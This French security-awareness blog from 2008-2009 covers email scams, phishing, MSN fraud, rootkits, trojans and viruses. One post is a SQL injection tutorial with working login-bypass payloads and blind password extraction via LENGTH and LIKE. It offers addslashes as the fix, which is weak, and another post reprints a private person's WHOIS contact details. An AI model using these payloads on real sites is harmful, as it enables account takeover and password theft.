Le Savoir est une arme

Les conseils

2009-06-17T06:21:00.000-07:00

Comprendre l'informatique et ses dangers...Pour mieux se protéger.

Bon à savoir

Il est conseillé d’avoir deux adresses e-mail : la première réservée à la famille et aux amis, la seconde dite “poubelle” dédiée aux jeux concours et aux inscriptions sur les forums. Vous verrez rapidement la seconde adresse se remplir de spam, scam, et autres courriels indésirables.

Ne mettez jamais votre adresse e-mail sur les forums ou dans les commentaires des blogs. Des logiciels robots scrutent la toilent pour collecter les e-mails et envoyer ensuite des spams, virus, etc.

N’ouvrez jamais les fichiers joints quand vous ne connaissez pas l’expéditeur ou si vous avez un doute sur celui-ci.

Ne communiquez jamais votre numéro de compte bancaire par mail.

Ne transférez pas les mails vous invitant à transférer le message à 10 personnes pour gagner un cadeau.

Vérifiez s’il s’agit d’un hoax (rumeur) sur Hoaxbuster ou HoaxKiller .

Arnaques par mail 4

2009-06-17T06:10:00.000-07:00

Arnaques par mail, comment éviter les pièges ?

L’arnaque à la banque : le phishing

Vous recevez un mail censé provenir de votre banque : même logo, adresse-mail correspondant à celle de votre banque, etc. Le message vous invite à vous connecter en cliquant sur un lien et mettre à jour votre compte en remplissant vos n° de compte et mot de passe. Attention arnaque ! Votre banque ne vous enverra jamais ce type de mail.

Si vous cliquez sur le lien, vous serez dirigé vers un site ressemblant étrangement au site de votre banque.
Mais en regardant l’adresse du site, on remarque que nous ne sommes pas sur le site de la banque. L’objectif du phishing est de récupérer vos codes d’accès et votre mot de passe pour ensuite vider vos comptes bancaires.

Comment se protéger du phishing ?

Ne jamais cliquer sur les liens présents dans les mails censés provenir de votre banque.
Votre banque ne vous demandera jamais de mettre à jour vos données en vous envoyant un simple mail.
L’adresse internet des banques est sécurisée. Vous pouvez le vérifier facilement car elle commence par “https” et un cadenas apparaît à droite de l’adresse.
Internet Explorer 7 et 8 intègrent une fonction anti-phishing. Vérifiez que cette fonctionnalité est bien active (Outils > Options Internet > onglet Avancés > rubrique Sécurité > cochez “Filtre anti-hameçonnage - Activer la vérification automatique de sites web”).

Ce type de mails touche aussi Paypal, Ebay, Orange, SNCF, Free… Retrouvez la liste des tentatives de phishing sur le site de Secuser.com

Arnaques par mail 3

2009-06-17T06:06:00.000-07:00

Arnaques par mail, comment éviter les pièges ?

L’arnaque à la loterie

Vous avez gagnez le gros lot à la loterie ! Sauf que vous ne vous êtes inscrit à aucune loterie et que pour toucher le jackpot vous devez juste répondre au mail. Attention arnaque ! Tout comme l’arnaque africaine, il s’agit de vous soutirez de l’argent. Pour recevoir votre gain, votre interlocuteur vous demandera de verser quelques centaines d’euros (qui sont censés vous en rapporter beaucoup plus !).

Comment se protéger de l’arnaque à la loterie ?

Ne répondez pas aux messages censés provenir de National Lotto Competition, Mega Lottery International ou encore Lotteria La primitiva…
Supprimez de suite ces messages et, si possible, ajoutez l’expéditeur à votre liste de spam.

Arnaques par mail 2

2009-06-17T06:01:00.000-07:00

Arnaques par mail, comment éviter les pièges ?

L’arnaque aux petites annonces

Alors que fleurissent les sites de petites annonces entre particuliers, une nouvelle arnaque voit le jour. Une personne vous contacte suite à une annonce que vous avez déposée (un tableau à 1 000€ par exemple). Elle se dit très intéressée, prend vos coordonnées et vous envoie un chèque d’un montant très supérieur a celui du bien vendu (8 000€). Elle vous dit d’encaisser le chèque (émis depuis l’étranger) et de lui renvoyer ensuite la différence. Attention arnaque ! Le gros montant de ce chèque est censé vous rassurer quant au sérieux de l’acheteur. D’autant plus qu’en déposant le chèque en banque, vous êtes effectivement crédité de 8 000€. Honnête jusqu’au bout, vous remboursez les 7 000 euros trop perçus à l’acheteur. Mais voilà qu’un mois plus tard, votre banquier vous appelle pour vous dire que le chèque encaissé n’est pas valable et que le crédit de 8 000 euros est donc annulé. Par contre le chèque de 7 000 euros remis à l’acheteur est lui tout à fait valable. Vous avez été victime d’une arnaque aux petites annonces !

Comment se protéger des arnaques aux petites annonces ?

Si un acheteur vous propose de vous verser un chèque d’un montant supérieur à celui du prix de l’objet vendu, dites-vous bien qu’il y a anguille sous roche. Ne répondez pas au soit disant acheteur et signalez son intention au site sur lequel vous venez de mettre en vente votre objet.
Evitez, si possible, les acheteurs situés à l’étranger. Les lenteurs administratives facilitent les escroqueries et il vous sera difficile, voire impossible, de retrouver un jour les traces du pseudo-acheteur.

Arnaques par mail 1

2009-06-17T05:44:00.000-07:00

Arnaques par mail, comment éviter les pièges ?

L’arnaque africaine : le scam

« Ma grand-tante au Niger m’a légué 1 million d’euros. Mais pour toucher l’héritage, j’ai besoin de vous ! Si vous m’aidez, je partagerai avec vous cet argent».

Qui n’a jamais reçu de scam (ruse) de ce genre ? Une personne vous invite à la contacter pour partager une rondelette somme d’argent. Pour cela, elle vous demande de répondre à son mail. Attention arnaque ! Ce type de message vise à vous extorquer des fonds. Si vous répondez au mail, votre correspondant vous enverra des faux documents pour tenter de prouver la véracité de l’histoire et vous soutirer de l’argent pour payer les frais de notaire, de douane, de banque.

Comment se protéger du scam ?

Ne répondez jamais aux sollicitations financières de personnes que vous ne connaissez pas.
Ne prenez pas le temps de répondre à ce type de mail et, si votre boite mail le permet, bloquez l’expéditeur ou ajoutez son mail dans la liste de spammeurs

Quelques exemples d’arnaques africaines sur Afrik.com

Arnaque MSN

2009-05-26T10:16:00.000-07:00

Après avoir reçu début 2007 des messages me proposant de savoir qui m'avait bloqué sur MSN ( évidement c'était une belle arnaque ) provenant de sites tels que quimeefface.com, checkmessenger.com, bloquo.com, blockoo.com, quienteadmite.com, etc... J'ai à nouveau reçu un message me proposant une solution miracle pour connaître quel contacte me bloque sur MSN :

Login - Mot de passe

__________________________________________________________________________

25 Mai 2009
je sais enfin qui me bloque sur MSN

Salut,
j ai trouvé un site de tchat ou tu peux voir qui t a bloqué sur msn
c est http://www.testomsn.com/
fais un test tu verras qui te bloque sans que tu le saches , en plus y a un tchat
a+

__________________________________________________________________________

Bon même si le phénomène est bien connu je tenais à mettre en garde les plus jeunes.
Ne cliquez jamais sur ces liens, demandez vous toujours quel est l'intérêt de ces sites....Voler votre boite mail, spamer le web, faire de la pub, faire du phishing?

Le whois donne ceci :

Registrant:
zack stendl
136 les danaides
toulouse, france 31000
France

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: TESTOMSN.COM
Created on: 14-May-09
Expires on: 14-May-10
Last Updated on: 14-May-09

Administrative Contact:
stendl, zack lynxblanc@hotmail.com
136 les danaides
toulouse, france 31000
France
(066) 743-8800 Fax --

Technical Contact:
stendl, zack lynxblanc@hotmail.com
136 les danaides
toulouse, france 31000
France
(066) 743-8800 Fax --

Domain servers in listed order:
NS35.DOMAINCONTROL.COM
NS36.DOMAINCONTROL.COM

Ce site ( www.testomsn.com ) a également un clone http://www.coco.fr/

Si l'un de vos contacte MSN c'est fait avoir, quelqu'un a modifié votre pseudo MSN ou que vous avez été spamé par ce type de messages. Prévenez votre contacte que sa boite mail a été infectée.
Si vous étés tombés dans le piège, tous vos contactes MSN aurons étés spamés via votre boite mail. Prévenez les de ne pas cliquer sur le lien, modifiez votre mot de passe, si vous avez Messenger Plus Live il est préférable d'exporter votre liste de contactes MSN, de créer une nouvelle boite mail et de faire une analyse anti virus et Malwarebytes.

Dernier conseil, "ne donnez jamais votre mot de passe".

Posez vous toujours les bonnes questions

Félicitation !
vous avez "peut être" gagné un trombone !

Pour le savoir veuillez remplire ce formulaire :

Type de carte :
N° de carte :
Date d'expiration : /
Trois derniers chiffres de la zone de signature :

Rootkit

2008-11-22T04:48:00.000-08:00

Rootkit

Mot emprunté au monde Unix / Linux dans lequel il désigne un parasite permettant de s'octroyer des droits "Root", c'est-à-dire :

-les niveaux de droits les plus élevés de l'administrateur de la machine
-afin de prendre le contrôle de cette dernière
-tout en restant furtif (invisible).

A partir de là, sous Unix/Linux, il est possible de faire ce que l'on veut sur cette machine dont implanter des processus parasites.

Il n'est pas aisé de violer les systèmes Unix / Linux et un Rootkit est nécessaire pour le faire.

Les Rootkits remontent à une période antérieure à 1997 puisqu'à cette époque démarre un projet open source (à code public) nommé "ChkRootKit" ("Chek RootKit") destiné à detecter les RootKits dans le monde Linux.

Dans le monde Windows, le viol du système est aisé et un Rootkit au sens de ceux du monde Unix n'est pas nécessaire pour prendre le contrôle des PC et les zombifier, d'autant que la très grande majorité des utilisateurs Windows, malgré les avertissements des sites de sécurité, travaille directement en mode administrateur.

Les Rootkits Windows sont restés, un temps, un travail purement intellectuel et spéculatif des laboratoires de recherches en virologie et des gentils hackers ("Whitehats"). Ils n'avaient aucune charge active ni n'étaient sortis des laboratoires.

Aujourd'hui, un Rootkit, dans le monde Windows (les versions de Windows à base de noyau NT sont concernées - NT, XP, 2000), désigne plutôt une boîte à outils (nous devrions plutôt parler de Tools Kit) insérée par un hacker du monde obscur du Net (les "Blackhats") et qui va l'aider à :

essentiellement cacher des parasites avec des Hooker. La grande activité des RootKits est de rendre un parasite totalement furtif (dont le rootkit lui-même) en interceptant toutes les formes de requêtes faites au système (aux APIs système et programmes de dignostique) par quelque application que ce soit et de perdre la réponse ou de la crétiniser afin qu'un antivirus ou un anti-trojans ou toute autre outil ou recherche n'aboutise jamais (impossibilité de tuer un processus, prétendre qu'un fichier a été détruit ou n'existe pas alors qu'il est bien là, masquer ou modifier le contenu d'un paquet etc. ...) et ne dévoile jamais la présence d'un parasite protégé par le RootKit

compromettre une machine déjà faible (failles non corrigées...) par la mise en place de plusieurs backdoors et autres outils lui "facilitant la vie" par la suite pour, en un second temps, déployer d'autres parasites, implanter de quoi utiliser la machine et en faire un zombie et pouvoir y revenir quand il veut sans avoir à utiliser une faille peut-être corrigée depuis...

Les RootKits sont devenus le problème numéro 1 des malveillances en 2006. Les détecter semble être une barrière à franchir en matière de recherches logiciel. Quant-à les éradiquer, eux et ce qu'ils cachent, c'est d'un tout autre niveau de difficultés - éradiquer un RootKit et restaurer un système stable n'est pas atteint dans 100% des cas. Quelques rootkits capables de pénétrer les BIOS (basic input/output system) les rendent sensibles au point de « planter » l’ordinateur si vous vous êtes débarrassés du rootkit.

Cheval de Troie Trojan

2008-11-22T04:14:00.000-08:00

Qu'est-ce que c'est ?

Les chevaux de Troie ("Trojan horses" ou "Trojans" en anglais) tirent leur nom de la célèbre légende mythologique. Comme dans cette dernière, ils utilisent une ruse pour agir de façon invisible, le plus souvent en se greffant sur un programme anodin.

Ils font partie des grandes menaces que l'on peut rencontrer sur le web, parmi les virus et autres vers . Pourtant, contrairement à ceux-ci, les chevaux de Troie ne se reproduisent pas (en tout cas, ce n'est pas leur objectif premier). Ce sont à la base de simples programmes destinés à être executés à l'insu de l'utilisateur.

Objectifs

Leur objectif est le plus souvent d'ouvrir une porte dérobée ("backdoor") sur le système cible, permettant par la suite à l'attaquant de revenir à loisir épier, collecter des données, les corrompre, contrôler voire même détruire le système. Certains chevaux de Troie sont d'ailleurs tellement évolués qu'ils sont devenus de véritables outils de prise en main et d'administration à distance.

Mode d'action

Leur mode opératoire est souvent le même, ils doivent tout d'abord être introduits dans le système cible le plus discrètement possible. Les moyens sont variés et exploitent le vaste éventail des failles de sécurité, du simple économiseur d'écran piégé (envoyé par mail ou autre, du type cadeau.exe, snow.exe, etc, etc...) jusqu'à l'exploitation plus complexe d'un buffer overflow.
Après leur introduction dans le système, ils se cachent dans des répertoires système ou se lient à des exécutables. Ils modifient le système d'exploitation cible (sous Windows, la base des registres) pour pouvoir démarrer en même temps que la machine. De plus, ils sont actifs en permanence (car un cheval de Troie est un véritable serveur, il reste à l'écoute des connections provenant de l'attaquant pour recevoir des instructions) mais ils restent furtifs et sont rarement détectables par l'utilisateur. Ainsi, un listing des tâches courantes ne fournira pas d'indication suffisante : soit le cheval de Troie y sera invisible, soit son nom sera tout ce qu'il y a de plus banal ("Patch.exe", ".exe", "winamp34.exe", "winrar.exe", "setup.exe", "rundlls").

Contrôle à distance

2008-11-21T06:42:00.000-08:00

LogMeIn Free est un software gratuit permettant de prendre le contrôle à distance d'un PC, il peut être très utile pour aider votre famille, amis ou vos proches à naviguer à distance dans leur PC, à leur monter où trouver tel ou tel fichier, comment installer un logiciel, etc...Mais aussi pour vous, il vous permet d'accéder à votre PC à partir de n'importe quel navigateur.
J'ai découvert ce software il y a quelques années et j'ai vraiment été séduit par sa simplicité d'utilisation et d'installation, il suffit d'envoyer un mail à vos proches pour prendre le contrôle de leur PC. De plus (si c'est toujours d'actualité) en téléchargent LogMeIn Free vous avez droit à 30 jours d'essai à LogMeIn Pro, ce qui permet de mettre côte à côte votre disque dur et celui de la prise de contôle et de transférer des fichiers par un simple glissement ou copier/coller.

Voici les fonctions disponibles :

Fonctionnalités d'accès à distance

Accès à vos fichiers à partir de n'importe quel navigateur
Accès à vos fichiers à partir d'un assistant personnel sans fil
Contrôle à distance et affichage du bureau
Presse-papiers pour synchronisation avec un ordinateur distant
Messagerie
Redémarrage/reconnexion (mode sans échec inclus)
Accès utilisateurs multiples

Sécurité

Cryptage de bout en bout en 128 et 256 bits
Détection d'intrusion SSL/TLS
Verrouillage des adresses IP
Accès à plusieurs niveaux basé sur autorisation
Suppression automatique des droits d'accès

Connexion

Aucune configuration de pare-feu, routeur ou proxy requise
Aucun droit d'administrateur requis pour l'ordinateur distant

Fonctionnalités d'accès à distance

Accès à vos fichiers à partir de n'importe quel navigateur
Accès à vos fichiers à partir d'un assistant personnel sans fil
Contrôle à distance et affichage du bureau
Déplacement des fichiers par glisser-déposer
Impression locale de documents distants
Son à distance
Transfert de fichiers
Partage
Synchronisation des fichiers
Mini conférence
Mappage des lecteurs
Connexion directe
Presse-papiers pour synchronisation avec un ordinateur distant
Messagerie
Redémarrage/reconnexion (mode sans échec inclus)
Accès utilisateurs multiples

Sécurité

Aucune configuration de pare-feu, routeur ou proxy requise
Aucun droit d'administrateur requis pour l'ordinateur distant

Le site officiel de LogMeIn
C'est ici

Les injections SQL : Trouver un mot de passe

2008-11-17T12:23:00.000-08:00

Les injections SQL

Les injections SQL peuvent servir à se connecter sur le compte d'une autre personne sans son mot de passe où encore à trouver des mots de passe.Elles sont très utiles pour hacker un site quand on a compris leur fonctionement.Et ils faut également comprendre leur principe si on veut protéger son site de ce genre de failles.Cet article s'adresse à tout le monde, que vous vouliez en apprendre plus sur le hacking ou que vous souhaitiez sécuriser votre site web.

1 - Description de la faille

On peut faire beaucoup d'injections SQL différentes, ici je vous expliquerai comment passer un formulaire de connection alors qu'on n'a pas le mot de passe et comment ensuite trouver ce mot de passe. Pour bypasser le formulaire de connection et se logguer on va injecter des petits morçeaux de codes SQL dont les informations sont forcément vraies (par exemple : 1=1).

Code HTML du formulaire de connection :

La plupart des sites utilisent un formulaire de connection similaire a celui-ci. Les informations envoyées dans ce formulaire sont ensuite traitées par une page en PHP qui vérifient les informations entrées avec celle présentes dans la base de données.

2 - Se loguer sans mot de passe avec SELECT

Les variables que vous avez enteés dans le forumaire vont etre ensuite utilisées dans les requetes SQL. La faille est a ce niveau. Il y a une fonction qui s'apelle get_magic_quotes_gpc() qui rajoute des antislashs ( ) devant les quotes ( ' ) et les doubles quotes ( " ) pour éviter les injections SQL.
Mais cette fonction n'est pas toujours activé par les hébergeurs ce qui engendre une vulnérabilité.

Dans ce premier exemple les logins et mots de passe sont stockés dans une table users de la base de donnée et nous allons prendre comme login it's me et comme password ah'ah"ah

Si get_magic_quotes_gpc() est activée, la requete sera interprétée comme cela :

Code : SQL
SELECT login FROM users WHERE login='it\'s me ' AND password='ah\'ah\"ah'

Si get_magic_quotes_gpc() est désactivée, la requete sera interprétée comme ceci :

Code : SQL
SELECT login FROM users WHERE login='it's me ' AND password='ah'ah"ah'

Le code SQL selectionne le login ( it's me ) si le login est dans la base de donnée et que le mot de passe entré correspond au mot de passe de la base de donnée.

Pour l'instant vous ne voyez pas le danger que provoque la désactivation de get_magic_quotes_gpc(), mais vous allez comprendre.

Nous allons maintenant injecter des données vraies dans le code SQL grace au formulaire de connection. Les informations vraies seront par exemple :

- 1=1
- 2=2
- 'a'='a' (je met les quotes car les caractères doivent etre entourés de quotes ' dans les requetes SQL)
- 'z'='z'
- 42<69> 'a'='a' comme information vraie car c'est celle qu'on utilise le plus souvent pour ce genre d'injection mais vous pouvez essayer avec d'autres informations vraies.
On va injecter 'OR 'a'='a comme login et comme mot de passe dans le formulaire de connection.
Non, je ne me suis pas trompé avec les quotes, on va bien entrer 'OR 'a'='a
Vous pensez peut etre qu'il y a un quote ' en trop au début et un quote ' qui manque a la fin, mais c'est justement cela qui permet de jouer sur la fermeture de la requete.

Une fois qu'on aura entré 'OR 'a'='a en pseudo et en login, la requete SQL sera :

Code : SQL
SELECT login FROM users WHERE login=''OR 'a'='a' AND password=''OR 'a'='a'

Maintenant vous comprenez mieux pourquoi j'ai mis un quote ' au début et que je n'en ai pas mis a la fin.
En effet, il y a déja un quote ' a la fin de la requete.
J'ai mis des couleurs au code SQL pour que vous compreniez mieux. En bleu la requete SQL de base et en rouge ce qu'on a entré dans le formulaire.

Pour ceux qui n'aurait pas compris, la partie OR 'a'='a' renverra forcément vrai.

Quand il n'y a rien entre 2 quotes '', cela veut dire que la chaine de caractère est vide mais cela ne nous sera jamais utile, a part si vous tombez sur un site web qui ne vérifie pas que les champs soient remplies et qu'un mec n'a rien mis en mot de passe. Autant vous dire que les chances sont très minces.
En plus nous n'avons pas besoin de cela pour se connecter a la place d'une autre personne puisque vous pourrez bientot vous connecter sans le mot de passe de votre victime.

La requete ci-dessus selectionne le pseudo ( 'OR 'a'='a ) si il n'y a pas de mot de passe ou si 'a'='a' .
Comme 'a' est toujours égale à 'a' le pseudo sera a chaque fois selectionné et vous serez connecté au site.

Alors vous etes content, vous venez de reussir a vous connecter sur un site en bypassant le mot de passe.

On va essayer de faire une injection avec une autre donnée vraie pour etre sur que vous avez compris.
On va essayer d'injecter 1=1, normalement c'est plus facile car on n'a moins de problémes avec les quotes ' mais on devra tout de même injecter une information de type caractére entourée par des quotes pour le mot de passe.

Par exemple, si on entre 'OR 1=1 en pseudo et en mot de passe.
La requete SQL sera :

Code : SQL
SELECT login FROM users WHERE login=''OR 1=1' AND password=''OR 1=1'

Mais cette requete SQL ne marchera pas car, si vous regardez les quotes vous vous rendez compte que certains quotes ne sont pas fermés au bon endroit.
Le quote a la fin de login=''OR 1=1' est invalide car il ouvre un quote qui est mal placé.
Maintenant vous comprenez pourquoi j'ai injecté 'a'='a' tout a l'heure.
On va donc revenir a notre exemple avec 'OR 'a'='a

Le probléme c'est qu'on a entré 'OR 'a'='a en pseudo, et que le site nous a logiquement loggué avec comme login 'OR 'a'='a.
C'est pas très joli, n'est ce pas ?

3 - Se loguer sur le compte d'une autre personne

On va maintenant voir comment se connecter sur le compte d'une autre personne car c'est tout de meme beaucoup plus intéréssant.
Dans notre exemple, on va essayer de se connecter au compte de TomSawyer alors qu'on ne connait pas son mot de passe.

On va donc commencer par entrer TomSawyer comme login dans le formulaire de connection. Ca c'est logique.
Et on va maintenant utiliser le #. Si vous avez réelement appris le PHP (pas si vous l'avez appris avec 2-3 tutos sur un site web), vous connaissez ce symbole et vous savez ce qu'il fait.

Un petit rappel pour les autres, tous les instructions que vous allez écrire après le # ne seront pas interprétées.
Et cela va nous etre très utile car on a souvent un quote en trop quand on fait des injections SQL.

En mot de passe, on va entrer 'OR 1=1#
Ce qui va donner :

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password=''OR 1=1#'

Ce qui équivaut également à la requete ci-dessous comme le quote ' après le # n'est pas interprété.

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password=''OR 1=1

La reqete selectionne le pseudo TomSawyer si le mot de passe est vide ( '' ) ou si 1=1, comme on l'a déja vu comme 1 est toujours égal à 1, le pseudo TomSawyer sera selectionné et nous nous connecterons a son compte.

La vérification du mot de passe ne sert plus a rien dans cet exemple comme on arrive a passer à travers.

On peut faire encore plus simple, regardez ce que cela donne si on entre TomSawyer'# en pseudo et ce que vous voulez en mot de passe.

Code : SQL
SELECT login FROM users WHERE login='TomSawyer'#' AND password=' blablabla'

Si vous observez bien les quotes, le login est selectionné sera bien TomSawyer puisque qu'il est entouré de quote.
Le # permet d'occulter tout ce qui se trouve après lui.
Vous pouvez mettre ce que vous voulez en mot de passe comme celui-ci ne sera pas vérifié (à cause du quote '). Mais mettez quelque chose car la plupart des scripts PHP vérifient que les champs du formulaire soient bien remplis.

La requete SQL sera donc interpreté comme celle qui suit (on a simplement supprimé tout ce qui se trouvait après le #) :

Code : SQL
SELECT login FROM users WHERE login='TomSawyer'

La requete que nous obtenons est donc simpliste : on selectionne le login TomSawyer (on se connecte avec comme login TomSawyer) et il n'y a aucune vérification.

C'était facile, non ?
Maintenant on va essayer de trouver le mot de passe de TomSawyer.

4 - Trouver le mot de passe avec LIKE

Maintenant vous savez comment entrer sur le compte d'une personne sans avoir son mot de passe.
Mais cela peut etre de connaitre ce mot de passe.
Par exemple si vous voulez changer le mot de passe de la personne, la plupart du temps le mot de passe initial est démandé.

On va continuer a faire des injections SQL dans le formulaire de connection pour trouver le mot de passe.

La première chose a faire quand on cherche un mot de passe, c'est de trouver sa longueur grâce à la fonction LENGTH.
On va entrer comme login TomSawyer' AND LENGTH(password)=4# et ce que vous voulez en mot de passe.

La requete sera alors :

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND LENGTH(password)=4#' AND password='blablabla'

qui équivaut a la requete suivante apreès suppression des instructions après le # :

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND LENGTH(password)=4

Si vous vous connectez au compte de TomSawyer cela signifie que son mot de passe fait 4 caractéres.
Si cela ne marche pas, essayer avec 5, 6, 7, 8 etc...
Plus le mot de passe est long, plus il sera dur a trouver.

Si le mot de passe est crypté en MD5, sa longueur sera 32 et il sera très difficile à trouver.

Maintenant qu'on connait la longueur du mot de passe, on va essayer de le trouver.
Je vous préviens tout de suite, c'est pas très marrant à faire et c'est très répétitif. Vous pouvez d'ailleurs créer un script qui le fait a votre place, mais vous ne pourrez le faire qu'une fois que vous aurez bien compris le principe.

On va maintenant utiliser LIKE.
Mettez TomSawyer' AND password LIKE 'a%'# en pseudo.

La requête devrait etre :

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password LIKE 'a%'#' AND password='blablabla'

équivalent à :

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password LIKE 'a%'

Si le mot de passe de TomSawyer commence par un a, vous vous connectez a son compte.
Si vous restez sur la page de connection c'est que son mot de passe ne commence pas par un a, essayez donc avec b, puis c etc (vous connaissez l'alpahbet).
Si vous ne trouvez toujours pas essayer des chiffres (1,2,3). Attention a essayer les chiffres, chiffre par chiffre, n'essayez pas directement 12 par exemple.

Si le mot de passe est codé en MD5, on aura pas besoin d'essayer toutes les lettres. En effet les mots de passes codés en MD5 sont en hexadécimal donc ils ne sont composés que des chiffres de 0 à 9 et de a,b,c,d et e.
Par contre il sera difficile car cela sera une suite de chiffre et de lettre sans aucun sens.

Une fois que vous avez trouvé la première lettre, il faut trouver la deuxiéme (logique).
Mettez alors TomSawyer' AND password LIKE 'aa%'# en pseudo.

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password LIKE 'aa%'#

Si cela ne marche pas c'est que la deuxiéme lettre n'est pas a.
On va donc essayer avec b comme deuxiéme lettre.

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password LIKE 'ab%'#

Et on tente les lettres les unes après les autres jusqu'a ce que cela marche, quand vous avez essayer les lettres de a à z, essayez les chiffres de 0 à 9.

Si cela ne marche toujours pas, il se peut que les mot de passe soient sensibles a la casse (majuscules et minuscules) ou encore qu'il y ai des caractéres spéciaux. C'est beaucoup beaucoup plus dur dans ces cas là.

Les dernières lettres du mot de passe sont souvent plus faciles a trouver car quand le mot de passe a un sens, on le devine souvent.

Dans notre exemple, imaginons qu'après 20 minutes, on est les 3 premières lettres (sur les 4).

Code : SQL
SELECT login FROM users WHERE login='TomSawyer' AND password LIKE 'all%'#

Pour la prochaine et dernière lettre (4éme), on tentera directement avec un o plutot que d'essayer encore une fois toutes les lettres de l'alphabet en commencant par a.

Une fois le mot de passe trouvé, dans ce cas là c'est allo (oui c'est assez idiot comme mot de passe, mais c'est un exemple simple).

Comme vous avez pu le voir la methode est longue, mais c'est plus rapide quand on connait la longueur du mot de passe et comme je vous l'ai déja dit, c'est assez simple de concevoir un script qui teste tout a votre place
Le script sera bien plus rapide que les logiciels qui teste en brute force car il teste beaucoup moins de possibilités puisque et il saura que dès qu'il a une lettre bonne.

5 - Corriger la faille

Si vous etes webmaster et que votre hébergeur a désactivé la fonction get_magic_quotes_gpc() alors vous pouvez etre victime d'injection SQL.
Pour vous protéger vous et vos membres, utilisez la fonction addlashes() qui rajoute des anti-slashs devant les quotes ' si get_magic_quotes_gpc() est désactivée.

Par exemple :

Code : PHP
$login = addslashes($_POST['login']);
$password = addslashes($_POST['password']);

Si vous êtes un utilisateur, je vous conseille de bien choisir vos mot de passe, si possible long et avec des chiffres car comme vous avez pu le voir, ils sont bien plus durs à trouver.

MSN Astuces

2008-11-17T11:56:00.000-08:00

Voici plusieurs astuces pour MSN Messenger qui vous faciliteront son utilisation

Comment savoir si un contact vous à supprimé sur MSN

Le but de cette manipulation est de savoir si votre contact vous a supprimé de sa liste de contact (j'ai bien dit supprimé et pas bloqué).

Pour le savoir pas besoin de logiciel. En vous rendant dans la liste de contact via le panneau de configuration de MSN. Vous retrouverez cette info indirectement.

Pour aller au panneau de configuration

Outils >> Options

Ensuite il faut choisir l'onglet CONFIDENTIALITE

A gauche vous retrouverez la liste de vos contacts qui peut vous voir en ligne, à droite ceux que vous avez bloqué.

Maintenant en faisant un simple click droit sur un contact vous obtiendrez l'information.
Si la case supprimé est grisée vous êtes toujours dans la liste de votre contact.
Par contre si vous avez la possibilité de la supprimer la personne vous à retiré de sa liste de contact.

Faire un zoom

Faire un zoom dans une fenêtre de conversation. Tenir Ctrl et jouez avec le Scroll de votre souris

Répéter un texte

Répéter un texte déjà écrit ! Dans la fenêtre de conversation une personne vous demande de réécrire votre dernier texte. Pas de problème Ctrl + la touche haut du clavier et vous retrouver vos texte écrits.

Caractères spéciaux

Caracteres Speciaux : Des signe arabes et tout des trucs comme ça comme nom. Voila lastuce : allez dans le menu démarrer > tout les programmes > accessoires > outils système > table des caractères et voila , vous avez de superbes caractères.

Quand votre fenêtre de conversation est trop chargée soit par le texte ou par les smiley's ou peut être par les envoie de fichier,taper simplement /clear dans la fenetre de conversation comme si vous parliez a votre correspondant(e), cela efacera toute le conversation, ce qui vous permetera certainement de vous y retrouver ( à taper dans la fenetre de conversation et nescésite MSG + )

Si vous avez envie d'aparaitre Hors Ligne taper /appearoffline , cela vous permetera d'aparaitre hors ligne ( à taper dans la fenetre de conversation et nescésite MSG + )

MSN Dangers en Vidéo

2008-11-11T16:26:00.000-08:00

Bonjour à tous, voici une petite vidéo que j'ai réalisé en deux parties pour vous prévenir des dangers des scripts de MSN Messenger Live Plus

Partie 1

Partie 2

Hijack

2008-11-11T06:55:00.000-08:00

Hijack - Hijacker - Hijacking

Définition :

Modification non sollicitée du comportement et/ou des réglages du navigateur de l'internaute

Une tentation forte des webmasters (et, surtout, des e-commerçants gangsters) est de modifier les réglages de votre navigateur à votre insu. Ceci se fait par l'intermédiaire de fonctionnalités standards (outils standards) mises à disposition des webmasters, tels que les contrôles ActiveX ou les JavaScript et autres langages de script. Ces modifications peuvent êtres anodines (mais agaçantes)

Par exemple :

Afficher un site en plein écran en masquant la quasi totalité des barres de boutons etc. ... (équivalent à l'appui par l'internaute sur la touche F11).

Modifier votre sélection de page de démarrage : vous avez choisi, chaque fois que vous lancez votre navigateur, de démarrer sur telle page. Et bien, de temps en temps, votre préférence est modifiée et votre navigateur démarre, par exemple, sur le site d'un coutumier du fait : Microsoft !

Modifier votre page de recherche - dito ci-dessus.

Ajouter de nouvelles entrées dans votre liste de favoris, entrées que vous n'avez jamais, vous mêmes, introduites.

Etc...

Définition Virus

2008-11-11T06:38:00.000-08:00

Virus : définition

Qu'est-ce qu'un virus informatique ?

Définition :

Virus : Programme auto-répliquant se liant à des organismes pré-existants
ou
Virus : Programme auto-répliquant contenant une charge généralement, mais pas forcément, hostile, ayant la faculté de se lier à des organismes pré-existants, susceptibles d'être dupliqués, afin d'assurer sa prolifération à l'insu des utilisateurs.

Ce qui caractérise un virus est :

sa faculté de s'exécuter (d'être un programme) et donc d'intervenir sur une machine hôte

sa faculté de s'exécuter sans le consentement de l'utilisateur (à son insu)

sa faculté de se reproduire (se dupliquer, se répliquer, proliférer dans l'organisme infecté) et son besoin d'un hôte. Il n'a pas la capacité de se propager seul en dehors de l'organisme infecté - lorsqu'il aura acquis cette faculté on l'appellera Vers (Worm). S'il n'a pas la capacité de se répliquer, ce n'est pas un virus mais un parasite.

Qu'est-ce qu'un virus ?

Un virus est un programme, souvent petit, certes, mais un programme, tout à fait normal, au même titre que Windows, votre tableur ou votre traitement de textes. Ce n'est que sa finalité qui diffère. Sa construction est essentiellement faite de 2 composants.

le dispositif de réplication

la charge active

C'est cette capacité à se répliquer, à se lier à du code déjà existant et à attendre d'avoir atteint un certain seuil de virulence avant de se déclencher qui a fait que l'on a appelé "virus" ces programmes malveillants. On définit donc un virus informatique comme un programme auto-répliquant ayant la faculté de lier ses répliques à des organismes pré-existants.

Charge active :

